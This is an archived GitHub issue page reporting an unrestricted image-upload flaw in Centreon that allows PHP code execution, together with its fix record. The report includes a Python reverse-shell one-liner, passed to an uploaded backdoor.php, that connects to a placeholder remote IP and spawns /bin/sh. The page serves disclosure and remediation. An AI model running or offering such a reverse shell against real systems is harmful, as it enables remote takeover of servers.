Skip to content
This repository has been archived by the owner on Dec 13, 2022. It is now read-only.

Unrestricted file upload leading to code execution #2979

Closed
centreon opened this issue Jun 30, 2015 · 1 comment
Closed

Unrestricted file upload leading to code execution #2979

centreon opened this issue Jun 30, 2015 · 1 comment
Assignees
@julienmathis
Labels
kind/enhancement status/implemented
Milestone
Centreon-2.6.2

Comments

@centreon
Copy link
Collaborator

Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6450, https://forge.centreon.com/issues/6450
Original Date: 2015-06-30

In the Media section, where you can upload a file image, upload a PHP file containing the following :

Then gain access to the shell by connecting to the website via https://website_url/centreon/img/media/test/backdoor.php?c=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yyy.yyy.yyy.yyy",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

yyy.yyy.yyy.yyy being the ip address of a remote server.
@centreon
Copy link
Collaborator Author

Original Redmine Comment
Author Name: Louis Ferret (Louis Ferret)
Original Date: 2015-06-30T17:28:14Z

Didn't think it would be published without validation, you should delete this ticket and keep the description.

@julienmathis julienmathis modified the milestone: Centreon-2.6.2 Aug 2, 2015
leoncx added a commit that referenced this issue Aug 4, 2015
@leoncx
* Fix #2979 : Better security when upload an image
60a817a
@julienmathis julienmathis self-assigned this Aug 6, 2015
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees

@julienmathis julienmathis

Labels
kind/enhancement status/implemented
Projects
None yet
Milestone
Centreon-2.6.2
Development

No branches or pull requests
2 participants
@julienmathis @bsauveton